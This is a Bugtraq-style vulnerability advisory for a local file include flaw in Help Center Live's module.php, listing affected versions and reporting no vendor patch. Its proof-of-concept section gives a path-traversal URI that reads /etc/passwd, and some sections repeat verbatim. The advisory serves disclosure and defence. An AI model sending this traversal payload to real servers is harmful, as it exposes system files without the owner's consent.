Help Center Live Module.PHP Local File Include Vulnerability
BID:15404
Info
Help Center Live Module.PHP Local File Include Vulnerability
| Bugtraq ID: | 15404 |
| Class: | Access Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Nov 14 2005 12:00AM |
| Updated: | Nov 14 2005 12:00AM |
| Credit: | HACKERS PAL is credited with the discovery of this vulnerability. |
| Vulnerable: |
Help Center Live Help Center Live 2.0 Help Center Live Help Center Live 1.2.8 Help Center Live Help Center Live 1.2.7 Help Center Live Help Center Live 1.2.6 Help Center Live Help Center Live 1.2.5 Help Center Live Help Center Live 1.2.4 Help Center Live Help Center Live 1.2.3 Help Center Live Help Center Live 1.2.2 Help Center Live Help Center Live 1.2.1 Help Center Live Help Center Live 1.2 Help Center Live Help Center Live 1.0 |
| Not Vulnerable: | |
Discussion
Help Center Live Module.PHP Local File Include Vulnerability
Help Center Live is prone to a local file include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input.
An attacker may leverage this issue to disclose sensitive information. This may help with further attacks on the affected computer.
It should be noted that this issue may also be leveraged to read arbitrary files on an affected computer with the privileges of the Web server.
Help Center Live is prone to a local file include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input.
An attacker may leverage this issue to disclose sensitive information. This may help with further attacks on the affected computer.
It should be noted that this issue may also be leveraged to read arbitrary files on an affected computer with the privileges of the Web server.
Exploit / POC
Help Center Live Module.PHP Local File Include Vulnerability
No exploit is required.
The following proof of concept URI is available:
http://www.example.com/support/module.php?module=osTicket&file=/../../../../../etc/passwd
No exploit is required.
The following proof of concept URI is available:
http://www.example.com/support/module.php?module=osTicket&file=/../../../../../etc/passwd
Solution / Fix
Help Center Live Module.PHP Local File Include Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
Help Center Live Module.PHP Local File Include Vulnerability
References:
References:
- Help Center Live Home Page (Help Center Live)